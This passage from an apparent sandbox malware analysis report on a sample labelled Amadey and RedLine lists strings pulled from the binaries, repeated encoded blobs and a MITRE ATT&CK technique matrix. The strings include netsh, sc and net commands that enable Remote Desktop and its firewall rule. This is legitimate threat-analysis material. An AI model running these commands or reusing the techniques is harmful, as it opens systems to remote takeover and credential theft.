0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000002.00000003.928647804.0000000005450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000002.00000003.928647804.0000000005450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000003.1339718622.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000003.1339718622.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000B.00000002.3354500885.0000000000D81000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000002.3354500885.0000000000D81000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: zY9sqWs[1].exe.11.dr	String found in binary or memory: net start termservice
Source: zY9sqWs[1].exe.11.dr	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setbfbda6ae1db325c2ff4b455ce9896e6d6c7109f0f87b7e67c332588c3c6da69d652098acf55d6d3c9b14c606ca54406ebd6b79NYh4LeECDV5TDw6VM72ZcWhv1q0aDsaggrKm8wZyeFx=OX5CMv==VD1obCUxKX2vdL==MXWvdL==PIR4YXZmOZJXFK==S8i3dSVxBpWWQK==V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeYlSsO60m0V==V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeVVeu7K4B02KfVSNp3lCL2AXjgHuH5Wrm3VGxV8SkciR53D==VrWwZ72nIx9HyIKFIynJNH2AEXyiV5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeYlSsdsWxZBxwCCJ9VMKyZYJl20N=V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeVVeu7K4B02KfUXhp2Jx9Igaj4LOz6q==K0WWRQJUKn yJOzwOV==YJGzcv==VJ WVv==S5WXb1R9esN9d7R9c8N9Zrl9Z2J9dLN9e1590L19Z2Z9cMZ9c7d9do1=Z8KoZx5o2Jy0PWzghHYl5Ar Z8KoZx5o2Jx=Z7yscx5o2Jx=0IF=0YF=0YJ=0YN=U1Gsbb==bMS3cyozBz==bMS3cCM BB9=02io0LyvZ72ndMNAc2OsfrmzM8G4aRV4QLN+QLR+M6CvdRdt2qNnLDtuJB==gF==KsWxaSQcQV==d7iobBwDCl6c3Ay=b7WBbhVwCCJmQAzjS7W3ThF4100dLXnqiLOuLQZofu==VMKyZYJl2XS 5AH4R00EUWQkK5 e5Bf9hrN=R20schE=T7GCcBVC35uXzyz93l==S0OIVv==VLGxZBEkK5Wb5RLgiMd=SL mdB9CyIedPa==R00KNEZzVB94OZyLQQPShre18K==Rrm3ZBVqPZ6cQRK=Ur BdB9yV7 zaB9DR7 wbXRzW7mxRBVqPZ6cQRK=NIFBMuQ5DmdWFK==drJ=e7J=R7 xdBVy4F2M6RDcTnuu7Qr2eVyf8rLy0r BbN1oO0S FsD g8OvSAzAiRXrGWVwMX1wLN0xEVqGbX54PZ6SCOTgh8uw6Wf2eU6sJmwpc8KwLRRl4JFZzA79g1N BgLjhEBgJCwpb1yobhFxPW1aJl1NQX9y4JWm5w3Lj2umHcvjgFyq60IkeLmybd9zO6Sd5w3qiMCmRQUPGeXIEVpwLN0xBV1=MX1QCb==Q8Omce0BMrqzZr==R7 xdBVy4F2M6RDcTnui6BvueUKf9Kgycn 7LSd74B2e3XLkQ2Oz5APw206iU0L=V6mWVzVRNHOT4hLcgsKE5WZ2gk6qP6Q3YJOybiRC25y5HWakhMO1SRDQ2UYjSIIyc2C4dBVCJpGlQK==R7 wcCV4P0KGPQ3cZ1KmZBVqP5ih2gvjg1Yw6BzAg1OZ9r97f2pzMOIDDGVUEtiWQ01=M2WxaRNzPJVlV6mWVzVRNHOT4hLcgsKE5WZ2gk6qP6Q3YJOybiRC25y5MQ7giLOlOgfm3U6aL44RWKKSTAx0IXSxKVy=V6mWVzVRNHOn3hTpg7qUSRKyQBCaP6QBermmZSNgGpGr2QPvf2Gx5Az71DWnUKQyWrmnZR9NHD==YIBzMyA=SLWpYSVw4IOd5BTggr7AEfbU3VKt7LQ3b1 xSLWpYSVw4IOd5BTggr7AEffU3VKt7LQ3b1 xV5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8NjTgRgG6Wq4gXliKSm6hHrf01=VMKyZCVn4H6 3QW=NoBAOL==NoBBMb==NoBANb==NoBBNL==R8WBchVy4HKT2QzbYF==Pop9dsWxZBxwCCJmQRjcM7tjJsSkcXtv1ZykzwadNH2q5MukJnBpJdB41Z2d3XXRNIxhCcSi3ESqDE==KnZjRSht4FJ=JnBpJdBCPZ59JHZpIv==VL 6ZSJD1JWk3w7cjLN=M1W7ZRN54Jmn3hDmgLek8MvA3UYt9KQCb1exZRQkBX0h3AW8Nl==Jl==d7i4dBRz4559CRO8Q2JhFu==d8Rbcr==drGxZB9xT7W8Yh9l3pR9KAHWg8O1QzvA3UutT0L=NIBzMyA4CWl=NIBzMyA4CmJ=NIBzMyA4CmN=NIBzMyA4C5Z=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_01032263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		51_2_01032263
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_01031C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		51_2_01031C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	221 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	3 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	4 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	1 BITS Jobs	21 Access Token Manipulation	33 Software Packing	NTDS	329 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	11 Scheduled Task/Job	312 Process Injection	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	121 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	1 DLL Side-Loading	Cached Domain Credentials	1091 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	121 Registry Run Keys / Startup Folder	111 Masquerading	DCSync	581 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	581 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 BITS Jobs	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	312 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report random.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: RedLine

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
random.exe